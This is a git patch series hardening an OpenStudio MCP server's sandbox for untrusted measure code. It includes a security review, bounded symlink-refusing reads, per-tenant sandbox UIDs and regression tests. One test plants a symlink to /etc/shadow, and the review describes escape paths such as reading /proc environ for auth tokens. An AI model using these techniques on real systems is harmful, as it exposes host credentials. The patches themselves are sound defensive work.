-could execute expressions when `openstudio measure -u` evaluates the generated
-measure.
-
-## Recommended Architecture
-
-Do not run untrusted code as a subprocess inside the long-lived MCP container.
-Use two components:
-
-```text
-MCP control plane
-  |
-  | job manifest + staged files
-  v
-Job runner/orchestrator
-  |
-  v
-Ephemeral sandbox worker
-  - one job only
-  - input mount read-only
-  - private output mount read-write
-  - no /repo, shared /runs, /inputs, home, or Docker socket
-  - no network
-  - destroyed after completion
-```
-
-The MCP server should:
-
-1. Validate requested paths.
-2. Copy only explicitly referenced OSM, EPW, measure, and OSW files into a
-   private job input directory.
-3. Submit an immutable job manifest containing hashes and limits.
-4. Receive only approved result artifacts.
-5. Never receive the Docker socket. A separate trusted runner should create
-   worker containers.
-
-The worker should use controls equivalent to:
-
-```text
---runtime=runsc
---network=none
---read-only
---user=10001:10001
---cap-drop=ALL
---security-opt=no-new-privileges=true
---pids-limit=256
---memory=<appropriate limit>
---cpus=<appropriate limit>
---tmpfs=/tmp:rw,noexec,nosuid,nodev,size=...
-input:/job/input:ro
-output:/job/output:rw
-```
-
-Also use the default or tighter seccomp profile, AppArmor/SELinux policy, a
-hard wall timeout, storage quotas, and kill the entire worker container on
-cancellation.
-
-## Tool Policy
-
-- `run_simulation`: sandboxed worker, with an internally generated OSW
-  containing no measure steps.
-- `run_osw`: sandboxed worker; disabled by default for remote users or reject
-  measure steps unless explicitly authorized.
-- `apply_measure`: sandboxed worker.
-- `test_measure`: sandboxed worker operating on a staged copy.
-- `openstudio measure -u`: sandboxed worker because it loads measure code.
-- Syntax checks: sandboxed too. Tests and imports can execute code through
-  plugins and startup behavior.
-
-Measure authoring itself can remain in the control plane if it only writes text
-into a private user directory. Any evaluation of that text must leave the
-control plane.
-
-## Deployment Priority
-
-1. Immediately mount `/inputs` and `/repo` read-only; mount only a dedicated
-   output directory read-write.
-2. Run the MCP image as non-root and add Docker resource/security flags.
-3. Disable `run_osw`, `apply_measure`, and `test_measure` in remote deployments
-   until isolated execution exists.
-4. Add `is_path_allowed()` checks to every simulation and measure path.
-5. Stage inputs into private job directories and reject symlinks and escaping
-   OSW references.
-6. Implement ephemeral worker containers.
-7. Use gVisor `runsc` for untrusted multi-user workloads; use microVMs if the
-   threat model includes determined hostile tenants.
-8. Add attack tests proving filesystem escape, environment leakage, network
-   access, fork exhaustion, and cross-user access succeed without the sandbox
-   and fail with it.
-
-Rootless Docker or user-namespace remapping reduces host impact, but neither
-replaces per-job isolation. Static measure scanning and human approval are
-useful secondary controls, not containment.
-
-## Sources
-
-- [Docker bind mounts](https://docs.docker.com/engine/storage/bind-mounts/)
-- [Docker container security options](https://docs.docker.com/reference/cli/docker/container/run)
-- [Docker seccomp](https://docs.docker.com/engine/security/seccomp/)
-- [Docker rootless mode](https://docs.docker.com/engine/security/rootless/)
-- [gVisor](https://gvisor.dev/docs/)
-- [gVisor with Docker](https://gvisor.dev/docs/user_guide/quick_start/docker/)
diff --git a/codex-security-review-feat-measure-exec-sandbox.MD b/codex-security-review-feat-measure-exec-sandbox.MD
deleted file mode 100644
index f8ae884..0000000
--- a/codex-security-review-feat-measure-exec-sandbox.MD
+++ /dev/null
@@ -1,214 +0,0 @@
-# Codex Security Review: `feat/measure-exec-sandbox`
-
-Reviewed June 7, 2026.
-
-## Verdict
-
-The branch makes substantial, technically sound improvements over `develop`.
-Landlock, seccomp, environment filtering, UID dropping, path checks, symlink
-checks, rlimits, and simulation process-group termination materially reduce the
-blast radius of authored measures.
-
-It is a good defense-in-depth sandbox for a local or trusted single-container
-deployment. It is not yet a sufficient hostile multi-tenant boundary. One
-critical post-test sandbox escape remains, and process/resource isolation is
-still weaker than a per-job container or microVM.
-
-## Findings
-
-### Critical: sandboxed tests are followed by unsandboxed Ruby execution
-
-After `test_measure_op` runs untrusted tests in the sandbox, it calls
-`_update_measure_xml(mdir, language)`. That helper executes:
-
-```text
-openstudio measure -u <measure_dir>
-```
-
-without `sandbox.build_env()`, `sandbox.prepare_workdir()`, or
-`sandbox.wrap_cmd()`.
-
-A sandboxed test has write access to its measure directory. It can replace
-`measure.rb` with top-level Ruby code, finish successfully, and rely on the
-root MCP process to load that modified file during the XML update. This crosses
-the sandbox boundary and restores arbitrary code execution with the server's
-authority.
-
-Required fix:
-
-- Never evaluate a file after it has been writable by untrusted code using an
-  unsandboxed process.
-- Run `openstudio measure -u` through the sandbox.
-- Prefer running it on a fresh private copy and copying only validated
-  `measure.xml` metadata back.
-- Alternatively, update checksums/metadata with a non-executing XML writer.
-
-### High: measure and test timeout handling can leave descendants alive
-
-`apply_measure`, reporting-measure tests, and normal measure tests use
-`subprocess.run(..., timeout=...)` without a new session or cgroup. On timeout,
-Python terminates the immediate wrapper process, but forked or daemonized
-children can survive.
-
-Those descendants retain their inherited Landlock/seccomp policy, but they can
-continue consuming CPU, PIDs, memory, and storage. They can also interfere with
-other sandbox workers that share UID 1001.
-
-Required fix:
-
-- Start every untrusted execution in a new session/process group.
-- On timeout, send TERM and then KILL to the complete process group.
-- Prefer a per-job cgroup or container and destroy that unit on completion.
-
-### High: shared UID and PID namespace weaken cross-user isolation
-
-Every worker uses UID 1001 in the same container and PID namespace. `/proc` is
-also granted read access. Concurrent jobs can observe process metadata and may
-signal same-UID processes. Depending on kernel ptrace policy, they may also
-inspect or manipulate peer processes.
-
-The default simulation concurrency of one does not cover concurrent
-`apply_measure` or `test_measure` calls.
-
-Required fix:
-
-- Use a separate PID namespace or container for each job.
-- At minimum, deny `ptrace`, `process_vm_readv`, `process_vm_writev`, and
-  cross-worker signaling where practical.
-- Use per-job UIDs if multiple jobs remain in one PID namespace.
-- Do not grant the host/container-wide `/proc`; mount a private proc filesystem.
-
-### High: broad `/etc`, `/proc`, and `/sys` read grants expose unnecessary data
-
-The Landlock policy grants all of `/etc`, `/proc`, and `/sys` read access.
-Dropped UID permissions block some sensitive files, but world-readable
-configuration, process metadata, mounted configuration secrets, kernel details,
-and service information remain visible.
-
-Required fix:
-
-- Determine the exact runtime files OpenStudio requires and grant only those.
-- Stage required certificates, locale data, timezone data, and configuration
-  into a minimal runtime root.
-- Use mount/PID namespaces where broad compatibility paths are unavoidable.
-
-### Medium: runtime hardening is not part of the documented default launch
-
-The image adds a sandbox UID, but the long-lived MCP server still runs as root.
-The README launch example does not apply `--read-only`, `--cap-drop=ALL`,
-`no-new-privileges`, PID/memory/CPU limits, or read-only input mounts.
-
-The subprocess sandbox reduces measure risk, but ordinary MCP server bugs still
-execute with root authority inside a container with writable host mounts.
-
-Recommended fix:
-
-- Run the control-plane server as non-root where OpenStudio permits it.
-- Make `/inputs`, `/repo`, and `/skills` read-only.
-- Apply container resource limits and capability restrictions.
-- Keep only a dedicated output/job directory writable.
-
-### Medium: sandbox status is not actually surfaced
-
-`active_tier()` exists but is not included in tool responses or audit events.
-It infers the tier from platform/configuration rather than a successful backend
-probe. Full mode does fail closed at execution time, which is good, but
-operators cannot inspect the effective state before submitting work.
-
-Recommended fix:
-
-- Probe Landlock/seccomp at startup.
-- Expose the result in `get_server_status`, audit logs, and every execution
-  result.
-- Distinguish requested mode from verified active controls.
-
-### Medium: public `run_osw` still copies the entire parent directory
-
-Path and escaping-symlink checks close the arbitrary-host-file issue, but
-copying the whole parent directory is still unnecessarily broad. An OSW in a
-large allowed directory can copy unrelated data and consume substantial disk.
-
-Recommended fix:
-
-- Parse the OSW and stage only explicitly referenced seed, weather, measure,
-  file, and companion resources.
-- Reject absolute and parent-traversing references unless separately authorized.
-- Apply file-count and byte limits during staging.
-
-### Low: rlimit installation failures do not fail closed
-
-The shim logs an rlimit failure and continues. Landlock and seccomp correctly
-fail closed, but resource backstops can silently be absent.
-
-Recommended fix:
-
-- Treat configured mandatory limits as fatal.
-- Record applied limits in the execution result.
-
-## Changes That Correctly Address `develop`
-
-- `apply_measure`, reporting-measure tests, normal tests, and simulations now
-  pass through a common sandbox wrapper.
-- The subprocess environment is explicitly allowlisted instead of inheriting
-  server secrets.
-- Full mode fails closed if Landlock or seccomp cannot engage.
-- Landlock is read-deny-by-default and limits writes to the job directory.
-- `/repo` and shared `/inputs` are no longer granted to the confined process.
-- `/dev` is reduced to specific device files.
-- Seccomp denies IPv4/IPv6 sockets and handles unexpected architectures and x32
-  fail-closed.
-- `io_uring_setup` is denied to prevent a network-filter bypass.
-- The child drops to a validated non-root UID/GID and sets `no_new_privs`.
-- Public simulation/OSW paths now use `is_path_allowed()`.
-- Escaping symlinks are rejected before staging.
-- Shared measures are copied before tests mutate them.
-- Simulation wall-clock timeout and process-group cancellation are implemented.
-- Ruby interpolation and generated argument identifiers are validated.
-- Unknown sandbox modes and non-finite timeout values no longer silently weaken
-  policy.
-- Security tests use dual-run canaries to prove both the original vulnerability
-  and the confined behavior.
-
-## How I Would Design It Differently
-
-For untrusted or remote multi-user use, I would make the process sandbox a
-secondary control and use a per-job worker as the primary boundary:
-
-```text
-non-root MCP control plane
-  -> validated immutable job manifest
-  -> trusted runner service
-  -> ephemeral worker container using gVisor/runsc
-```
-
-Each worker would receive:
-
-- One read-only staged input directory containing only referenced files.
-- One private writable output directory.
-- No `/repo`, shared `/runs`, `/inputs`, user home, credentials, or Docker
-  socket.
-- `--network=none`.
-- A read-only root filesystem and bounded tmpfs.
-- Non-root UID, all capabilities dropped, `no-new-privileges`.
-- Dedicated PID, mount, IPC, user, and network namespaces.
-- Cgroup limits for memory, CPU, PIDs, I/O, and wall time.
-- Automatic destruction on success, failure, cancellation, or timeout.
-
-The control plane would validate and copy back only expected artifacts. It
-would never execute generated Ruby or Python after a worker has modified it.
-
-This costs more operationally, but it gives a much clearer security claim:
-arbitrary measure code can compromise only an ephemeral worker and its private
-job data, not the long-lived MCP process or another user's execution.
-
-## Verification
-
-Focused Windows-compatible tests:
-
-```text
-46 passed, 16 skipped, 1 deselected
-```
-
-The excluded test directly exercises Linux non-root Landlock behavior and
-cannot run on Windows. Docker integration could not be rerun during this review
-because access to the local Docker Desktop engine was denied.
diff --git a/mcp_server/skills/measure_authoring/operations.py b/mcp_server/skills/measure_authoring/operations.py
index 30bb848..5536df9 100644
--- a/mcp_server/skills/measure_authoring/operations.py
+++ b/mcp_server/skills/measure_authoring/operations.py
@@ -5,6 +5,7 @@
 """
 from __future__ import annotations
 
+import contextlib
 import re
 import shutil
 import subprocess
@@ -16,7 +17,7 @@
 
 from mcp_server import sandbox
 from mcp_server.config import INPUT_ROOT, is_path_allowed, user_run_root
-from mcp_server.util import reject_escaping_symlinks
+from mcp_server.util import read_file_bounded, reject_escaping_symlinks
 
 
 def custom_measures_dir() -> Path:
@@ -538,14 +539,17 @@ def _copy_generated(name: str, max_bytes: int) -> None:
             source = staged_measure / name
             if not source.exists():
                 return
-            if not source.is_file() or source.is_symlink():
-                raise RuntimeError(f"Failed to update measure metadata: invalid generated {name}")
-            data = source.read_bytes()
-            if len(data) > max_bytes:
+            # Bounded, no-follow read: `measure -u` ran UNTRUSTED code (confined)
+            # that could have swapped the output for a symlink (-> a host secret)
+            # or a giant file. read_file_bounded uses O_NOFOLLOW and caps the read
+            # at max_bytes+1, so neither a TOCTOU symlink swap nor an oversized
+            # file reaches the unconfined server.
+            try:
+                data = read_file_bounded(source, max_bytes)
+            except ValueError as e:
                 raise RuntimeError(
-                    f"Failed to update measure metadata: generated {name} exceeds "
-                    f"{max_bytes} bytes",
-                )
+                    f"Failed to update measure metadata: invalid generated {name}: {e}",
+                ) from e
             temp_path: Path | None = None
             with tempfile.NamedTemporaryFile(
                 dir=measure_dir,
@@ -555,7 +559,10 @@ def _copy_generated(name: str, max_bytes: int) -> None:
                 fh.write(data)
                 temp_path = Path(fh.name)
             try:
-                temp_path.chmod(0o644)
+                # chmod is best-effort: replace() is the critical step, and some
+                # filesystems/mounts (or non-POSIX hosts) reject chmod.
+                with contextlib.suppress(OSError):
+                    temp_path.chmod(0o644)
                 temp_path.replace(measure_dir / name)
             finally:
                 temp_path.unlink(missing_ok=True)
@@ -1178,15 +1185,24 @@ def test_measure_op(
 
         # Update measure.xml checksums — test_model.osm was added to tests/,
         # and any new files must be registered for OS App Measure Manager.
-        _update_measure_xml(mdir, language)
-
-        return {
+        # Best-effort here: the (confined) test already ran and its pass/fail is
+        # the contract. A metadata-refresh failure (measure -u nonzero, or a
+        # rejected oversize/symlink output) is surfaced as a warning, NOT a test
+        # failure — confinement, not this call's exit code, is the security
+        # boundary, so a passing test must not be masked. (create/edit keep the
+        # raise: there the regenerated measure.xml IS the product.)
+        result = {
             "ok": proc.returncode == 0,
             "passed": passed,
             "failed": failed,
             "errors": errors,
             "test_output": display,
         }
+        try:
+            _update_measure_xml(mdir, language)
+        except RuntimeError as e:
+            result["metadata_warning"] = str(e)
+        return result
 
     except subprocess.TimeoutExpired:
         return {"ok": False, "error": "Test run timed out (60s)"}
diff --git a/mcp_server/util.py b/mcp_server/util.py
index d3d2926..bbe9308 100644
--- a/mcp_server/util.py
+++ b/mcp_server/util.py
@@ -3,6 +3,7 @@
 import json
 import os
 import shutil
+import stat
 from pathlib import Path
 
 
@@ -32,6 +33,50 @@ def reject_escaping_symlinks(root: Path) -> str | None:
     return None
 
 
+def read_file_bounded(path: Path, max_bytes: int) -> bytes:
+    """Read a regular file WITHOUT following a final-component symlink, capping
+    the read at ``max_bytes``.
+
+    Hardening for copying back files produced by confined-but-untrusted code
+    (e.g. ``openstudio measure -u`` regenerating ``measure.xml`` in a staged
+    dir):
+      * O_NOFOLLOW (where available) closes the symlink-swap TOCTOU — a measure
+        that replaces the output with a link to e.g. /etc/shadow cannot redirect
+        the read to the link target.
+      * the read stops at ``max_bytes + 1``, so an oversized output cannot be
+        slurped wholesale into memory before being rejected.
+
+    Raises ``ValueError`` on a symlink, a non-regular file (dir/fifo/device), an
+    oversize file, or an unreadable path. On platforms without O_NOFOLLOW the
+    symlink guard degrades to the caller's own is_symlink() check (the sandbox
+    targets Linux).
+    """
+    flags = (os.O_RDONLY | getattr(os, "O_NOFOLLOW", 0)
+             | getattr(os, "O_NONBLOCK", 0) | getattr(os, "O_BINARY", 0))
+    try:
+        fd = os.open(path, flags)
+    except OSError as e:
+        # ELOOP => final component is a symlink (O_NOFOLLOW); surface clearly.
+        raise ValueError(f"cannot read {path} (symlink or unreadable): {e}") from e
+    try:
+        if not stat.S_ISREG(os.fstat(fd).st_mode):
+            raise ValueError(f"not a regular file: {path}")
+        chunks: list[bytes] = []
+        remaining = max_bytes + 1
+        while remaining > 0:
+            chunk = os.read(fd, remaining)
+            if not chunk:
+                break
+            chunks.append(chunk)
+            remaining -= len(chunk)
+        data = b"".join(chunks)
+        if len(data) > max_bytes:
+            raise ValueError(f"file exceeds {max_bytes} bytes: {path}")
+        return data
+    finally:
+        os.close(fd)
+
+
 def safe_read_text(path: Path, max_bytes: int = 200_000) -> str:
     data = safe_read_bytes(path, max_bytes=max_bytes)
     return data.decode("utf-8", errors="replace")
diff --git a/tests/test_measure_authoring.py b/tests/test_measure_authoring.py
index b48ad4e..70580bf 100644
--- a/tests/test_measure_authoring.py
+++ b/tests/test_measure_authoring.py
@@ -4,6 +4,7 @@
 """
 import asyncio
 import uuid
+from pathlib import Path
 
 import pytest
 from conftest import integration_enabled, server_params, setup_example, unwrap
@@ -203,6 +204,59 @@ async def _run():
     asyncio.run(_run())
 
 
+@pytest.mark.integration
+def test_xml_refresh_failure_preserves_passing_test_results():
+    # Regression: a post-test metadata-refresh failure must NOT mask a passing
+    # (confined) test. The test drops an escaping symlink while confined; the
+    # post-test reject_escaping_symlinks guard then makes _update_measure_xml
+    # raise. Before this fix that raise propagated and test_measure returned
+    # ok:False, dropping passed/failed. Confinement — not the refresh's success —
+    # is the security boundary.
+    if not integration_enabled():
+        pytest.skip("integration disabled")
+
+    async def _run():
+        async with stdio_client(server_params()) as (r, w):
+            async with ClientSession(r, w) as s:
+                await s.initialize()
+                create = unwrap(await s.call_tool("create_measure", {
+                    "name": _unique("xml_refresh_warn"),
+                    "description": "metadata refresh warning probe",
+                    "run_body": '    runner.registerInfo("ok")',
+                    "language": "Ruby",
+                }))
+                assert create["ok"] is True, create
+                measure_dir = Path(create["measure_dir"])
+                # Replace the generated test with a PASSING one that, while running
+                # confined, plants an escaping symlink in the measure dir. The
+                # post-test reject_escaping_symlinks guard trips _update_measure_xml
+                # — deterministic, unlike `measure -u`'s (very tolerant) exit code.
+                test_files = sorted((measure_dir / "tests").glob("*_test.rb"))
+                assert len(test_files) == 1, test_files
+                test_files[0].write_text(
+                    "require 'minitest/autorun'\n"
+                    "class EscapeLinkTest < Minitest::Test\n"
+                    "  def test_drop_escaping_symlink\n"
+                    "    File.symlink('/etc/shadow', 'evil_escape_link') "
+                    "unless File.symlink?('evil_escape_link')\n"
+                    "    assert(File.symlink?('evil_escape_link'))\n"
+                    "  end\n"
+                    "end\n",
+                    encoding="utf-8",
+                )
+                return unwrap(await s.call_tool("test_measure", {
+                    "measure_dir": str(measure_dir),
+                }))
+
+    res = asyncio.run(_run())
+    assert res["ok"] is True, f"passing test masked by xml-refresh failure: {res}"
+    assert res["passed"] > 0, res
+    assert "metadata_warning" in res, (
+        f"expected non-fatal metadata_warning when refresh fails, got: {res}"
+    )
+    assert "escape" in res["metadata_warning"].lower(), res["metadata_warning"]
+
+
 @pytest.mark.integration
 def test_test_measure_python_passes():
     """Create a simple Python measure, run its tests."""
diff --git a/tests/test_path_safety.py b/tests/test_path_safety.py
index 16aa24d..48b954f 100644
--- a/tests/test_path_safety.py
+++ b/tests/test_path_safety.py
@@ -5,12 +5,56 @@
 from __future__ import annotations
 
 import json
+import os
 import subprocess as _subprocess
 
 import pytest
 
+from mcp_server.util import read_file_bounded
+
 pytestmark = pytest.mark.unit
 
+
+class TestReadFileBounded:
+    """read_file_bounded — bounded, symlink-refusing copy-back read used after
+    confined `openstudio measure -u` regenerates measure.xml/README.md."""
+
+    def test_reads_within_bound(self, tmp_path):
+        # Validates: a normal generated file is returned verbatim.
+        f = tmp_path / "measure.xml"
+        f.write_bytes(b"<measure/>" * 5)
+        assert read_file_bounded(f, 1000) == b"<measure/>" * 5
+
+    def test_rejects_oversize(self, tmp_path):
+        # Regression: untrusted measure -u could write a giant measure.xml; the
+        # read is bounded (max_bytes+1) so it can't be slurped wholesale into
+        # the unconfined server's memory (Copilot C1).
+        f = tmp_path / "big.xml"
+        f.write_bytes(b"A" * 200)
+        with pytest.raises(ValueError, match="exceeds"):
+            read_file_bounded(f, 100)
+
+    @pytest.mark.skipif(not hasattr(os, "O_NOFOLLOW"), reason="O_NOFOLLOW is POSIX-only")
+    def test_refuses_to_follow_symlink(self, tmp_path):
+        # Regression: measure -u (untrusted) could swap the output for a symlink
+        # to a host secret; O_NOFOLLOW means copy-back never reads the link
+        # target (TOCTOU). A naive read_bytes() would return the secret here.
+        secret = tmp_path / "secret"
+        secret.write_bytes(b"TOPSECRET")
+        link = tmp_path / "measure.xml"
+        link.symlink_to(secret)
+        with pytest.raises(ValueError, match="symlink"):
+            read_file_bounded(link, 1000)
+
+    @pytest.mark.skipif(not hasattr(os, "O_NONBLOCK"), reason="POSIX fifo test")
+    def test_refuses_non_regular_file(self, tmp_path):
+        # Validates: a fifo/dir masquerading as a generated file is rejected
+        # (not a regular file) instead of blocking or reading junk.
+        d = tmp_path / "README.md"
+        d.mkdir()
+        with pytest.raises(ValueError, match="not a regular file"):
+            read_file_bounded(d, 1000)
+
 # ---------------------------------------------------------------------------
 # C-1: seed_file path traversal guard in run_osw
 # ---------------------------------------------------------------------------

From 3afb1e0b2f3e994730d8b947761df7a234fc114b Mon Sep 17 00:00:00 2001
From: brianlball <brian.ball@nrel.gov>
Date: Sun, 7 Jun 2026 12:47:20 -0400
Subject: [PATCH 26/26] fix(security): per-tenant sandbox uids + drop /proc
 from Landlock (H1/M1/M2)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Post-merge hardening of the measure/sim sandbox for multi-tenant HTTP.

H1 (secret leak): /proc was a Landlock RO root, so a confined measure could read /proc/<pid>/environ — on a non-root server (measure uid == server uid) that recovers the server secrets clean-env stripped, incl. HTTP auth tokens. Drop /proc from the RO allowlist; Landlock now denies it for everyone. Verified EnergyPlus/OpenStudio still run (test_mcp_seb4 + full sandbox suite green).

M1 (fork-bomb DoS) + M2 (posix no FS isolation): every tenant shared uid 1001, so RLIMIT_NPROC (per-uid) was one shared budget (one tenant starves all) and posix-tier run dirs were mutually readable by DAC. Add config.sandbox_ids(): each remote tenant (HTTP session / auth principal) derives its own stable uid via hashlib (2000..61999, gid==uid); LOCAL keeps the baked 1001. Wired into wrap_cmd + prepare_workdir so chown and setuid agree. Per-uid NPROC budgets + DAC isolation even without Landlock.

Tests (red-green verified, all RED on unfixed code): test_path_safety TestPerTenantSandboxUid (distinct/stable uids, LOCAL base, uid<=0 clamp); test_sandbox proc-not-in-RO-allowlist, full-tier-denies-/proc/self/environ, per-tenant-uid DAC isolation. Updated test_posix/test_h5 uid assertions to the per-tenant contract (HTTP fixtures now derive a uid); base-uid clamp moved to a unit test.

Co-Authored-By: Claude Opus 4.8 (1M context) <noreply@anthropic.com>
---
 mcp_server/config.py      | 39 ++++++++++++++++
 mcp_server/sandbox.py     | 23 +++++++---
 tests/test_path_safety.py | 43 ++++++++++++++++++
 tests/test_sandbox.py     | 94 +++++++++++++++++++++++++++++++++++----
 4 files changed, 184 insertions(+), 15 deletions(-)

diff --git a/mcp_server/config.py b/mcp_server/config.py
index a541f2e..5eff5d4 100644
--- a/mcp_server/config.py
+++ b/mcp_server/config.py
@@ -118,6 +118,45 @@ def _safe_sandbox_id(env_val: str, default: int) -> int:
 SANDBOX_UID = _safe_sandbox_id(os.environ.get("OSMCP_SANDBOX_UID", "1001"), 1001)
 SANDBOX_GID = _safe_sandbox_id(os.environ.get("OSMCP_SANDBOX_GID", "1001"), 1001)
 
+# Per-tenant uid derivation (multi-user hardening). Every distinct remote caller
+# (HTTP session / auth principal) gets its OWN sandbox uid so that:
+#   - RLIMIT_NPROC — which the kernel counts PER REAL UID — is a private budget,
+#     so one tenant's fork bomb can't starve every other tenant's runs; and
+#   - DAC isolates tenants' run dirs from each other even in the posix tier
+#     (no Landlock), since the dirs are chowned to, and processes run as,
+#     different uids.
+# The local single user (stdio / off-request) keeps the baked-in SANDBOX_UID,
+# preserving today's behavior. Derived uids sit above the system/sandbox range
+# and below `nobody`, and are never root.
+_PER_TENANT_UID_BASE = 2000
+_PER_TENANT_UID_SPAN = 60000  # uids 2000..61999
+
+
+def _derive_tenant_uid(key: str) -> int:
+    """Stable, process-independent uid for a tenant key.
+
+    Uses hashlib (NOT the salted builtin hash()) so chown (server) and setuid
+    (shim, a separate process) derive the SAME uid for a request across restarts.
+    """
+    import hashlib
+    digest = hashlib.sha256(key.encode("utf-8")).digest()
+    return _PER_TENANT_UID_BASE + (int.from_bytes(digest[:4], "big") % _PER_TENANT_UID_SPAN)
+
+
+def sandbox_ids() -> tuple[int, int]:
+    """(uid, gid) the CURRENT caller's confined subprocess drops to.
+
+    Resolved per-call from caller identity (same key in → same uid out, so a
+    request's prepare_workdir chown and the shim's setuid agree). LOCAL → the
+    baked SANDBOX_UID/GID; each remote tenant → its own derived uid (gid==uid).
+    """
+    from mcp_server.identity import LOCAL, user_key
+    key = user_key()
+    if key == LOCAL:
+        return (SANDBOX_UID, SANDBOX_GID)
+    uid = _derive_tenant_uid(key)
+    return (uid, uid)
+
 # rlimit backstops for confined subprocesses (0 = off). Generous by design — they
 # catch runaway bombs, not tune normal use. CPU/AS default off: a CPU-second cap
 # would kill long annual sims, and RLIMIT_AS (virtual address space) breaks
diff --git a/mcp_server/sandbox.py b/mcp_server/sandbox.py
index 1f8a61d..80bc85b 100644
--- a/mcp_server/sandbox.py
+++ b/mcp_server/sandbox.py
@@ -31,7 +31,6 @@
 from mcp_server.config import (
     COMMON_MEASURES_DIR,
     COMSTOCK_MEASURES_DIR,
-    SANDBOX_GID,
     SANDBOX_MODE,
     SANDBOX_NET,
     SANDBOX_RLIMIT_AS,
@@ -39,8 +38,8 @@
     SANDBOX_RLIMIT_FSIZE,
     SANDBOX_RLIMIT_NOFILE,
     SANDBOX_RLIMIT_NPROC,
-    SANDBOX_UID,
     SKILLS_DIR,
+    sandbox_ids,
 )
 
 # Read-only roots the confined subprocess legitimately needs (Landlock grants
@@ -48,8 +47,13 @@
 # by default: anything not listed — another user's run, /tmp, arbitrary host
 # files — is unreadable. Missing paths are skipped by the Landlock layer.
 _FULL_MODES = ("auto", "full", "landlock")
+# /proc is deliberately NOT granted (H1): with /proc readable a confined measure
+# could read /proc/<pid>/environ and, on a non-root server (measure uid == server
+# uid), recover the server's secrets that clean-env stripped — including HTTP auth
+# tokens — and inspect peer tenants' processes. OpenStudio/EnergyPlus run without
+# it. /sys/<...> hardware info stays (no secrets; some libs read CPU topology).
 _RO_SYSTEM = ("/usr", "/lib", "/lib64", "/bin", "/sbin", "/etc",
-              "/opt/venv", "/usr/local", "/var/oscli", "/proc", "/sys")
+              "/opt/venv", "/usr/local", "/var/oscli", "/sys")
 
 # Specific device files the confined process needs — granted individually instead
 # of the whole /dev directory. A `/dev` rw grant also exposes writable /dev/shm and
@@ -192,9 +196,13 @@ def wrap_cmd(cmd: list[str], work_dir: Path | str,
                   "full FS/network confinement", file=sys.stderr)
             _warned_no_backend = True
         return list(cmd)
+    # Per-tenant uid/gid: each remote caller drops to its own uid (private NPROC
+    # budget + DAC isolation); the local single user keeps the base uid. Resolved
+    # here so it matches the chown prepare_workdir does for the same request.
+    uid, gid = sandbox_ids()
     wrapped = [
         sys.executable, "-m", "mcp_server._sandbox_exec",
-        "--uid", str(SANDBOX_UID), "--gid", str(SANDBOX_GID),
+        "--uid", str(uid), "--gid", str(gid),
     ]
     for flag, value in (
         ("--rlimit-fsize", SANDBOX_RLIMIT_FSIZE),
@@ -233,10 +241,13 @@ def prepare_workdir(work_dir: Path | str) -> None:
     if not enabled() or not (hasattr(os, "geteuid") and os.geteuid() == 0):
         return
     work = Path(work_dir)
+    # Per-tenant uid/gid (matches the shim's setuid for this same request) so the
+    # dropped process owns its run dir and tenants are DAC-isolated from each other.
+    uid, gid = sandbox_ids()
     # follow_symlinks=False (lchown): never let a symlink inside the dir redirect
     # the chown to a target outside it (symlink-traversal privilege issue).
     with contextlib.suppress(OSError):
-        os.chown(work, SANDBOX_UID, SANDBOX_GID, follow_symlinks=False)
+        os.chown(work, uid, gid, follow_symlinks=False)
     for path in work.rglob("*"):
         with contextlib.suppress(OSError):
-            os.chown(path, SANDBOX_UID, SANDBOX_GID, follow_symlinks=False)
+            os.chown(path, uid, gid, follow_symlinks=False)
diff --git a/tests/test_path_safety.py b/tests/test_path_safety.py
index 48b954f..71cd926 100644
--- a/tests/test_path_safety.py
+++ b/tests/test_path_safety.py
@@ -55,6 +55,49 @@ def test_refuses_non_regular_file(self, tmp_path):
         with pytest.raises(ValueError, match="not a regular file"):
             read_file_bounded(d, 1000)
 
+
+class TestPerTenantSandboxUid:
+    """Per-tenant sandbox uid derivation (M1/M2). Each remote tenant gets its own
+    uid so RLIMIT_NPROC (per-uid) is a private budget and DAC isolates run dirs
+    even without Landlock; the local single user keeps the baked-in base uid."""
+
+    def test_local_keeps_base_uid(self, monkeypatch):
+        # Validates: stdio/off-request single user keeps the baked sandbox uid —
+        # preserves today's behavior, no per-tenant derivation.
+        import mcp_server.config as cfg
+        monkeypatch.setattr("mcp_server.identity.user_key", lambda: "local")
+        assert cfg.sandbox_ids() == (cfg.SANDBOX_UID, cfg.SANDBOX_GID)
+
+    def test_distinct_uid_per_tenant(self, monkeypatch):
+        # Regression (M1/M2): all tenants shared uid 1001 -> one shared NPROC
+        # budget (cross-tenant fork-bomb DoS) and zero DAC isolation in the posix
+        # tier. Each tenant key must map to its OWN non-root uid.
+        import mcp_server.config as cfg
+        monkeypatch.setattr("mcp_server.identity.user_key", lambda: "alice")
+        a = cfg.sandbox_ids()
+        monkeypatch.setattr("mcp_server.identity.user_key", lambda: "bob")
+        b = cfg.sandbox_ids()
+        assert a != b, "distinct tenants must get distinct sandbox uids"
+        assert a[0] >= 2000 and b[0] >= 2000, "derived uids must be above the system/sandbox range"
+        assert a[0] != cfg.SANDBOX_UID, "a tenant uid must differ from the local base uid"
+        assert a[1] == a[0] and b[1] == b[0], "gid tracks uid"
+
+    def test_uid_stable_for_same_key(self, monkeypatch):
+        # Validates: derivation is stable across calls (hashlib, not randomized
+        # hash()) so a request's chown and setuid agree on the same uid.
+        import mcp_server.config as cfg
+        monkeypatch.setattr("mcp_server.identity.user_key", lambda: "carol")
+        assert cfg.sandbox_ids() == cfg.sandbox_ids()
+
+    def test_sandbox_uid_zero_clamped(self):
+        # Regression (Codex H5): OSMCP_SANDBOX_UID<=0 must clamp to a non-root uid
+        # so the local base uid can never be root (kept as a unit test now that the
+        # HTTP h5 path exercises per-tenant derivation instead of the base uid).
+        import mcp_server.config as cfg
+        assert cfg._safe_sandbox_id("0", 1001) == 1001
+        assert cfg._safe_sandbox_id("-5", 1001) == 1001
+        assert cfg._safe_sandbox_id("4242", 1001) == 4242
+
 # ---------------------------------------------------------------------------
 # C-1: seed_file path traversal guard in run_osw
 # ---------------------------------------------------------------------------
diff --git a/tests/test_sandbox.py b/tests/test_sandbox.py
index 00e62e6..ca24297 100644
--- a/tests/test_sandbox.py
+++ b/tests/test_sandbox.py
@@ -23,8 +23,8 @@
     are rejected (check is unconditional, not gated by OSMCP_SANDBOX).
 Fix increment 2 (UID drop + rlimits) and increment 3 (Landlock FS + seccomp
 net-deny) have landed:
-  - test_posix_drops_root_and_applies_rlimits — uid 1001, NPROC rlimit, DAC blocks
-    a root-owned write (OSMCP_SANDBOX=posix).
